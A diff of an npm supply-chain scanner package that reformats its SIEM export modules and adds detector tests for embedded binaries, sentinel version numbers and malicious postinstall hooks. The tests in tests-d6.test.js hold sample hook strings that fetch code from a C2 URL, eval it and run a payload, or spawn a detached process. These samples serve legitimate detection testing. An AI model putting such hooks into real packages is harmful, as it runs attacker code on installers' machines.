@lateos/npm-scan 0.18.2 → 1.0.0

package/backend/siem/cef.js

@@ -1,33 +1,33 @@
-export function generateCEF(scans) {
-  const entries = [];
-  for (const s of scans) {
-    for (const f of (s.findings || [])) {
-      const atkId = f.atk_id || f.id;
-      const desc = (f.description || f.title || '').replace(/\\/g, '\\\\').replace(/\|/g, '\\|');
-      const sevMap = { critical: 10, high: 8, medium: 5, low: 2 };
-      const sev = sevMap[f.severity] || 5;
-      const pkgName = (s.package_name || 'unknown').replace(/\|/g, '\\|');
-      const pkgVer = (s.version || '').replace(/\|/g, '\\|');
-      entries.push([
-        'CEF:0',
-        'npm-scan',
-        'npm-scan',
-        process.env.npm_package_version || '0.4.0',
-        atkId,
-        desc,
-        String(sev),
-        `suser=${pkgName} ${pkgVer}`,
-        `msg=${desc}`,
-        `cs1=${atkId}`,
-        `cs1Label=atkId`,
-        `cs2=${f.severity}`,
-        `cs2Label=severity`,
-        `cs3=${pkgName}`,
-        `cs3Label=package`,
-        `cs4=${pkgVer}`,
-        `cs4Label=version`,
-      ].join('|'));
-    }
-  }
-  return entries.join('\n');
+export function generateCEF(scans) {
+  const entries = [];
+  for (const s of scans) {
+    for (const f of (s.findings || [])) {
+      const atkId = f.atk_id || f.id;
+      const desc = (f.description || f.title || '').replace(/\\/g, '\\\\').replace(/\|/g, '\\|');
+      const sevMap = { critical: 10, high: 8, medium: 5, low: 2 };
+      const sev = sevMap[f.severity] || 5;
+      const pkgName = (s.package_name || 'unknown').replace(/\|/g, '\\|');
+      const pkgVer = (s.version || '').replace(/\|/g, '\\|');
+      entries.push([
+        'CEF:0',
+        'npm-scan',
+        'npm-scan',
+        process.env.npm_package_version || '0.4.0',
+        atkId,
+        desc,
+        String(sev),
+        `suser=${pkgName} ${pkgVer}`,
+        `msg=${desc}`,
+        `cs1=${atkId}`,
+        `cs1Label=atkId`,
+        `cs2=${f.severity}`,
+        `cs2Label=severity`,
+        `cs3=${pkgName}`,
+        `cs3Label=package`,
+        `cs4=${pkgVer}`,
+        `cs4Label=version`,
+      ].join('|'));
+    }
+  }
+  return entries.join('\n');
 }

package/backend/siem/ecs.js

@@ -1,41 +1,41 @@
-export function generateECS(scans) {
-  const events = [];
-  for (const s of scans) {
-    for (const f of (s.findings || [])) {
-      const atkId = f.atk_id || f.id;
-      const sevMap = { critical: 100, high: 80, medium: 50, low: 20 };
-      events.push({
-        '@timestamp': new Date().toISOString(),
-        event: {
-          kind: 'alert',
-          category: 'threat',
-          type: ['indicator', 'threat'],
-          action: 'npm-scan-detected',
-          severity: sevMap[f.severity] || 50,
-        },
-        message: `[${atkId}] ${f.severity.toUpperCase()}: ${f.description || f.title || 'Unknown finding'}`,
-        log: { level: f.severity },
-        observer: {
-          vendor: 'Lateos',
-          product: 'npm-scan',
-          version: process.env.npm_package_version || '0.7.0',
-        },
-        labels: {
-          package: s.package_name || 'unknown',
-          version: s.version || 'unknown',
-          atk_id: atkId,
-          severity: f.severity,
-        },
-        vulnerability: {
-          classification: 'npm-supply-chain',
-          reference: `https://npm-scan.io/atk/${atkId}`,
-          id: atkId,
-          description: f.description || f.title || null,
-          enumeration: 'ATK',
-        },
-        file: f.evidence ? { name: f.evidence } : undefined,
-      });
-    }
-  }
-  return events.map(e => JSON.stringify(e)).join('\n');
+export function generateECS(scans) {
+  const events = [];
+  for (const s of scans) {
+    for (const f of (s.findings || [])) {
+      const atkId = f.atk_id || f.id;
+      const sevMap = { critical: 100, high: 80, medium: 50, low: 20 };
+      events.push({
+        '@timestamp': new Date().toISOString(),
+        event: {
+          kind: 'alert',
+          category: 'threat',
+          type: ['indicator', 'threat'],
+          action: 'npm-scan-detected',
+          severity: sevMap[f.severity] || 50,
+        },
+        message: `[${atkId}] ${f.severity.toUpperCase()}: ${f.description || f.title || 'Unknown finding'}`,
+        log: { level: f.severity },
+        observer: {
+          vendor: 'Lateos',
+          product: 'npm-scan',
+          version: process.env.npm_package_version || '0.7.0',
+        },
+        labels: {
+          package: s.package_name || 'unknown',
+          version: s.version || 'unknown',
+          atk_id: atkId,
+          severity: f.severity,
+        },
+        vulnerability: {
+          classification: 'npm-supply-chain',
+          reference: `https://npm-scan.io/atk/${atkId}`,
+          id: atkId,
+          description: f.description || f.title || null,
+          enumeration: 'ATK',
+        },
+        file: f.evidence ? { name: f.evidence } : undefined,
+      });
+    }
+  }
+  return events.map(e => JSON.stringify(e)).join('\n');
 }

package/backend/siem/index.js

@@ -1,19 +1,19 @@
-import { generateCEF } from './cef.js';
-import { generateECS } from './ecs.js';
-import { generateSentinel } from './sentinel.js';
-import { generateQRadar } from './qradar.js';
-
-export function generateSIEM(scans, format = 'cef') {
-  switch (format) {
-    case 'cef':
-      return generateCEF(scans);
-    case 'ecs':
-      return generateECS(scans);
-    case 'sentinel':
-      return generateSentinel(scans);
-    case 'qradar':
-      return generateQRadar(scans);
-    default:
-      throw new Error(`Unknown SIEM format: ${format}. Supported: cef, ecs, sentinel, qradar`);
-  }
+import { generateCEF } from './cef.js';
+import { generateECS } from './ecs.js';
+import { generateSentinel } from './sentinel.js';
+import { generateQRadar } from './qradar.js';
+
+export function generateSIEM(scans, format = 'cef') {
+  switch (format) {
+    case 'cef':
+      return generateCEF(scans);
+    case 'ecs':
+      return generateECS(scans);
+    case 'sentinel':
+      return generateSentinel(scans);
+    case 'qradar':
+      return generateQRadar(scans);
+    default:
+      throw new Error(`Unknown SIEM format: ${format}. Supported: cef, ecs, sentinel, qradar`);
+  }
 }

package/backend/siem/qradar.js

@@ -1,57 +1,57 @@
-export function generateQRadar(scans) {
-  const events = [];
-  for (const s of scans) {
-    for (const f of (s.findings || [])) {
-      const atkId = f.atk_id || f.id;
-      events.push({
-        source: 'npm-scan',
-        version: process.env.npm_package_version || '0.7.0',
-        devicetime: new Date().toISOString(),
-        devicepayload: [
-          s.package_name || 'unknown',
-          s.version || 'unknown',
-          atkId,
-          f.severity,
-          f.title || f.description || '',
-          f.evidence || '',
-        ].join('\t'),
-        devicevendor: 'Lateos',
-        devicename: 'npm-scan',
-        deviceproduct: 'npm-scan',
-        atk_id: atkId,
-        severity: f.severity,
-        package_name: s.package_name || 'unknown',
-        package_version: s.version || 'unknown',
-        finding_title: f.title || f.description || '',
-        finding_description: f.description || f.title || '',
-        evidence: f.evidence || '',
-        mitigation: f.mitigation || '',
-        raw_category: 'NPM Supply Chain Threat',
-        qid: _qrQid(f.severity),
-        category: _qrCategory(f.severity),
-      });
-    }
-  }
-  return events.map(e => JSON.stringify(e)).join('\n');
-}
-
-const QID_MAP = {
-  critical: 90050001,
-  high: 90050002,
-  medium: 90050003,
-  low: 90050004,
-};
-
-function _qrQid(severity) {
-  return QID_MAP[severity] || 90050003;
-}
-
-function _qrCategory(severity) {
-  const map = {
-    critical: 'Critical Severity Malware',
-    high: 'High Severity Malware',
-    medium: 'Medium Severity Malware',
-    low: 'Low Severity Malware',
-  };
-  return map[severity] || 'Medium Severity Malware';
+export function generateQRadar(scans) {
+  const events = [];
+  for (const s of scans) {
+    for (const f of (s.findings || [])) {
+      const atkId = f.atk_id || f.id;
+      events.push({
+        source: 'npm-scan',
+        version: process.env.npm_package_version || '0.7.0',
+        devicetime: new Date().toISOString(),
+        devicepayload: [
+          s.package_name || 'unknown',
+          s.version || 'unknown',
+          atkId,
+          f.severity,
+          f.title || f.description || '',
+          f.evidence || '',
+        ].join('\t'),
+        devicevendor: 'Lateos',
+        devicename: 'npm-scan',
+        deviceproduct: 'npm-scan',
+        atk_id: atkId,
+        severity: f.severity,
+        package_name: s.package_name || 'unknown',
+        package_version: s.version || 'unknown',
+        finding_title: f.title || f.description || '',
+        finding_description: f.description || f.title || '',
+        evidence: f.evidence || '',
+        mitigation: f.mitigation || '',
+        raw_category: 'NPM Supply Chain Threat',
+        qid: _qrQid(f.severity),
+        category: _qrCategory(f.severity),
+      });
+    }
+  }
+  return events.map(e => JSON.stringify(e)).join('\n');
+}
+
+const QID_MAP = {
+  critical: 90050001,
+  high: 90050002,
+  medium: 90050003,
+  low: 90050004,
+};
+
+function _qrQid(severity) {
+  return QID_MAP[severity] || 90050003;
+}
+
+function _qrCategory(severity) {
+  const map = {
+    critical: 'Critical Severity Malware',
+    high: 'High Severity Malware',
+    medium: 'Medium Severity Malware',
+    low: 'Low Severity Malware',
+  };
+  return map[severity] || 'Medium Severity Malware';
 }

package/backend/siem/sentinel.js

@@ -1,28 +1,28 @@
-export function generateSentinel(scans) {
-  const events = [];
-  for (const s of scans) {
-    for (const f of (s.findings || [])) {
-      const atkId = f.atk_id || f.id;
-      events.push({
-        TimeGenerated: new Date().toISOString(),
-        Computer: process.env.COMPUTERNAME || process.env.HOSTNAME || 'npm-scan-host',
-        SourceSystem: 'npm-scan',
-        DeviceVendor: 'Lateos',
-        DeviceProduct: 'npm-scan',
-        DeviceVersion: process.env.npm_package_version || '0.7.0',
-        SeverityLevel: f.severity,
-        Severity: f.severity.toUpperCase(),
-        EventType: 'npm-supply-chain-threat',
-        ATKId: atkId,
-        FindingTitle: f.title || f.description || '',
-        FindingDescription: f.description || f.title || '',
-        Evidence: f.evidence || '',
-        PackageName: s.package_name || 'unknown',
-        PackageVersion: s.version || 'unknown',
-        Mitigation: f.mitigation || '',
-        ThreatClassification: 'npm-supply-chain',
-      });
-    }
-  }
-  return JSON.stringify(events, null, 2);
+export function generateSentinel(scans) {
+  const events = [];
+  for (const s of scans) {
+    for (const f of (s.findings || [])) {
+      const atkId = f.atk_id || f.id;
+      events.push({
+        TimeGenerated: new Date().toISOString(),
+        Computer: process.env.COMPUTERNAME || process.env.HOSTNAME || 'npm-scan-host',
+        SourceSystem: 'npm-scan',
+        DeviceVendor: 'Lateos',
+        DeviceProduct: 'npm-scan',
+        DeviceVersion: process.env.npm_package_version || '0.7.0',
+        SeverityLevel: f.severity,
+        Severity: f.severity.toUpperCase(),
+        EventType: 'npm-supply-chain-threat',
+        ATKId: atkId,
+        FindingTitle: f.title || f.description || '',
+        FindingDescription: f.description || f.title || '',
+        Evidence: f.evidence || '',
+        PackageName: s.package_name || 'unknown',
+        PackageVersion: s.version || 'unknown',
+        Mitigation: f.mitigation || '',
+        ThreatClassification: 'npm-supply-chain',
+      });
+    }
+  }
+  return JSON.stringify(events, null, 2);
 }

package/backend/tests-d5-enhanced.test.js

@@ -0,0 +1,46 @@
+import { test, describe } from 'node:test';
+import assert from 'assert/strict';
+import * as detectors from './detectors/index.js';
+
+describe('D5: Binary Embed Enhancement', () => {
+  test('D5: flags cross-platform campaign-1 binary set with high confidence', async () => {
+    const allFiles = [
+      { path: 'bin/agent-linux-x64', content: String.fromCharCode(0x7f) + 'ELF' },
+      { path: 'bin/agent-macos-arm64', content: String.fromCharCode(0xcf, 0xfa, 0xed, 0xfe) },
+      { path: 'bin/agent-windows-x86.exe', content: String.fromCharCode(0x4d, 0x5a) },
+    ];
+    const pkg = { name: 'suspicious-pkg', version: '1.0.0' };
+    const findings = await detectors.runAll(pkg, [], null, allFiles);
+    const matches = findings.filter(f => f.id === 'TIER1-BINARY-EMBED');
+    assert(matches.length > 0, 'Expected TIER1-BINARY-EMBED finding');
+    const hasCrossPlatform = matches.some(m =>
+      m.evidence.some(e => e.includes('cross-platform')),
+    );
+    assert(hasCrossPlatform, 'Expected cross-platform binary set evidence');
+  });
+
+  test('D5: cross-platform binary set scores > 85', async () => {
+    const allFiles = [
+      { path: 'bin/agent-linux-x64', content: String.fromCharCode(0x7f) + 'ELF' },
+      { path: 'bin/agent-macos-arm64', content: String.fromCharCode(0xcf, 0xfa, 0xed, 0xfe) },
+    ];
+    const pkg = { name: 'suspicious-pkg', version: '1.0.0' };
+    const findings = await detectors.runAll(pkg, [], null, allFiles);
+    const matches = findings.filter(f => f.id === 'TIER1-BINARY-EMBED');
+    const hasHighScore = matches.some(m => m.confidenceScore > 85);
+    assert(hasHighScore, `No finding with confidenceScore > 85; scores: ${matches.map(m => m.confidenceScore).join(', ')}`);
+  });
+
+  test('D5: single binary not flagged as cross-platform', async () => {
+    const allFiles = [
+      { path: 'bin/agent-linux-x64', content: String.fromCharCode(0x7f) + 'ELF' },
+    ];
+    const pkg = { name: 'normal-pkg', version: '1.0.0' };
+    const findings = await detectors.runAll(pkg, [], null, allFiles);
+    const matches = findings.filter(f => f.id === 'TIER1-BINARY-EMBED');
+    const hasPlatformLabel = matches.some(m =>
+      m.evidence.some(e => e.includes('cross-platform')),
+    );
+    assert(!hasPlatformLabel, 'Single binary should not be flagged as cross-platform');
+  });
+});

package/backend/tests-d6-version-anomaly.test.js

@@ -0,0 +1,58 @@
+import { test, describe } from 'node:test';
+import assert from 'assert/strict';
+import * as detectors from './detectors/index.js';
+
+describe('D6: Version Anomaly', () => {
+  test('D6: flags 99.99.99 when legitimate max is 5.3.2', async () => {
+    const pkg = { name: '@widget/core', version: '99.99.99' };
+    const registryMeta = ['1.0.0', '1.5.0', '2.0.0', '2.1.0', '3.0.0', '4.0.0', '5.0.0', '5.3.2'];
+    const findings = await detectors.runAll(pkg, [], registryMeta);
+    const match = findings.find(f => f.id === 'TIER1-VERSION-ANOMALY');
+    assert(match, 'Expected TIER1-VERSION-ANOMALY finding');
+    assert(match.confidenceScore > 90, `confidenceScore ${match.confidenceScore} <= 90`);
+  });
+
+  test('D6: flags 11.11.11 with high confidence', async () => {
+    const pkg = { name: 'internal-utils', version: '11.11.11' };
+    const registryMeta = ['1.0.0', '1.0.1', '1.1.0', '1.2.0', '2.0.0'];
+    const findings = await detectors.runAll(pkg, [], registryMeta);
+    const match = findings.find(f => f.id === 'TIER1-VERSION-ANOMALY');
+    assert(match, 'Expected TIER1-VERSION-ANOMALY finding');
+    assert(match.confidenceScore > 85, `confidenceScore ${match.confidenceScore} <= 85`);
+  });
+
+  test('D6: does NOT flag legitimate 2.0.0 jump from 1.9.9', async () => {
+    const pkg = { name: 'stable-lib', version: '2.0.0' };
+    const registryMeta = [
+      '1.0.0', '1.1.0', '1.2.0', '1.3.0', '1.4.0', '1.5.0',
+      '1.6.0', '1.7.0', '1.8.0', '1.9.0', '1.9.9',
+    ];
+    const findings = await detectors.runAll(pkg, [], registryMeta);
+    const match = findings.find(f => f.id === 'TIER1-VERSION-ANOMALY');
+    assert(!match, 'Should not flag legitimate 2.0.0 major bump');
+  });
+
+  test('D6: handles null registry gracefully — degrades confidence', async () => {
+    const pkg = { name: 'offline-pkg', version: '99.99.99' };
+    const findings = await detectors.runAll(pkg);
+    const match = findings.find(f => f.id === 'TIER1-VERSION-ANOMALY');
+    assert(match, 'Expected TIER1-VERSION-ANOMALY finding');
+    assert(match.confidenceScore < 70, `confidenceScore ${match.confidenceScore} >= 70`);
+  });
+
+  test('D6: no finding on KNOWN_REPUTABLE_PACKAGES regardless of version', async () => {
+    const pkg = { name: 'react', version: '99.99.99' };
+    const registryMeta = ['1.0.0', '2.0.0'];
+    const findings = await detectors.runAll(pkg, [], registryMeta);
+    const match = findings.find(f => f.id === 'TIER1-VERSION-ANOMALY');
+    assert(!match);
+  });
+
+  test('D6: no finding on normal semver within range', async () => {
+    const pkg = { name: 'widget-core', version: '5.4.1' };
+    const registryMeta = ['1.0.0', '2.0.0', '3.0.0', '4.0.0', '5.0.0', '5.4.0'];
+    const findings = await detectors.runAll(pkg, [], registryMeta);
+    const match = findings.find(f => f.id === 'TIER1-VERSION-ANOMALY');
+    assert(!match);
+  });
+});

package/backend/tests-d6.test.js

@@ -0,0 +1,116 @@
+import { test, describe } from 'node:test';
+import assert from 'assert/strict';
+import * as detectors from './detectors/index.js';
+
+// ─── D6a — tier1-version-confusion ──────────────────────────────────
+
+describe('D6a — tier1-version-confusion', () => {
+  test('D6a: detects exact sentinel version 99.99.99', async () => {
+    const pkg = { name: 'internal-utils', version: '99.99.99' };
+    const findings = await detectors.runAll(pkg);
+    const match = findings.find(f => f.id === 'TIER1-VERSION-CONFUSION');
+    assert(match, 'Expected TIER1-VERSION-CONFUSION finding');
+    assert.equal(match.confidence, 'HIGH');
+    assert(match.confidenceScore >= 80, `confidenceScore ${match.confidenceScore} < 80`);
+  });
+
+  test('D6a: detects sentinel family versions 9.9.9 / 10.10.10 / 11.11.11', async () => {
+    for (const version of ['9.9.9', '10.10.10', '11.11.11']) {
+      const pkg = { name: 'corp-auth', version };
+      const findings = await detectors.runAll(pkg);
+      const match = findings.find(f => f.id === 'TIER1-VERSION-CONFUSION');
+      assert(match, `Expected finding for version ${version}`);
+      assert(match.confidenceScore >= 60, `confidenceScore ${match.confidenceScore} < 60 for version ${version}`);
+    }
+  });
+
+  test('D6a: no finding on legitimate semver', async () => {
+    const pkg = { name: 'lodash', version: '4.17.21' };
+    const findings = await detectors.runAll(pkg);
+    const match = findings.find(f => f.id === 'TIER1-VERSION-CONFUSION');
+    assert(!match);
+  });
+
+  test('D6a: no finding on KNOWN_REPUTABLE_PACKAGES regardless of version', async () => {
+    const pkg = { name: 'react', version: '99.99.99' };
+    const findings = await detectors.runAll(pkg);
+    const match = findings.find(f => f.id === 'TIER1-VERSION-CONFUSION');
+    assert(!match);
+  });
+});
+
+// ─── D6b — tier1-multistage-postinstall ──────────────────────────────
+
+describe('D6b — tier1-multistage-postinstall', () => {
+  test('D6b: detects two-stage download + binary execution in postinstall', async () => {
+    const pkg = {
+      name: 'malicious-pkg',
+      version: '1.0.0',
+      scripts: {
+        postinstall: 'node -e "fetch(process.env.C2_URL).then(r=>r.text()).then(eval)" && execFile("./payload")',
+      },
+    };
+    const findings = await detectors.runAll(pkg);
+    const match = findings.find(f => f.id === 'TIER1-MULTISTAGE-POSTINSTALL');
+    assert(match, 'Expected TIER1-MULTISTAGE-POSTINSTALL finding');
+    assert.equal(match.confidence, 'HIGH');
+    assert(match.confidenceScore >= 80, `confidenceScore ${match.confidenceScore} < 80`);
+  });
+
+  test('D6b: detects detached background process spawn', async () => {
+    const pkg = {
+      name: 'persist-pkg',
+      version: '1.0.0',
+      scripts: {
+        postinstall: 'spawn("node", ["server.js"], { detached: true })',
+      },
+    };
+    const findings = await detectors.runAll(pkg);
+    const match = findings.find(f => f.id === 'TIER1-MULTISTAGE-POSTINSTALL');
+    assert(match, 'Expected TIER1-MULTISTAGE-POSTINSTALL finding');
+    assert(match.confidenceScore >= 75, `confidenceScore ${match.confidenceScore} < 75`);
+  });
+
+  test('D6b: no finding on clean build script', async () => {
+    const pkg = {
+      name: 'clean-pkg',
+      version: '1.0.0',
+      scripts: {
+        postinstall: 'node build.js',
+      },
+    };
+    const findings = await detectors.runAll(pkg);
+    const match = findings.find(f => f.id === 'TIER1-MULTISTAGE-POSTINSTALL');
+    assert(!match);
+  });
+
+  test('D6b: no duplicate finding when D3 already fires on same hook', async () => {
+    const pkg = {
+      name: 'dual-pkg',
+      version: '1.0.0',
+      scripts: {
+        postinstall: 'node -e "fetch(process.env.C2_URL).then(r=>r.text()).then(eval)" && execFile("./payload")',
+      },
+    };
+    const findings = await detectors.runAll(pkg);
+    const d6bMatches = findings.filter(f => f.id === 'TIER1-MULTISTAGE-POSTINSTALL');
+    assert(d6bMatches.length > 0, 'Expected at least one TIER1-MULTISTAGE-POSTINSTALL finding');
+    assert.equal(d6bMatches[0].id, 'TIER1-MULTISTAGE-POSTINSTALL');
+    assert(d6bMatches[0].id !== 'ATK-003');
+  });
+});
+
+// ─── D2 Miasma Signature ────────────────────────────────────────────
+
+describe('D2 — named signature', () => {
+  test('D2 Miasma signature: detects "Miasma: The Spreading Blight" → CRITICAL', async () => {
+    const pkg = { name: 'test-pkg', version: '1.0.0' };
+    const jsFiles = [{ path: 'evil.js', content: 'const id = "Miasma: The Spreading Blight"; doEvil();' }];
+    const findings = await detectors.runAll(pkg, jsFiles, {}, []);
+    const match = findings.find(f => f.id === 'TIER1-INFOSTEALER');
+    assert(match, 'Expected TIER1-INFOSTEALER finding from Miasma signature');
+    assert.equal(match.confidence, 'CRITICAL');
+    assert.equal(match.confidenceScore, 98);
+    assert(match.evidence.some(e => e.includes('Miasma: The Spreading Blight')), 'evidence should contain the signature string');
+  });
+});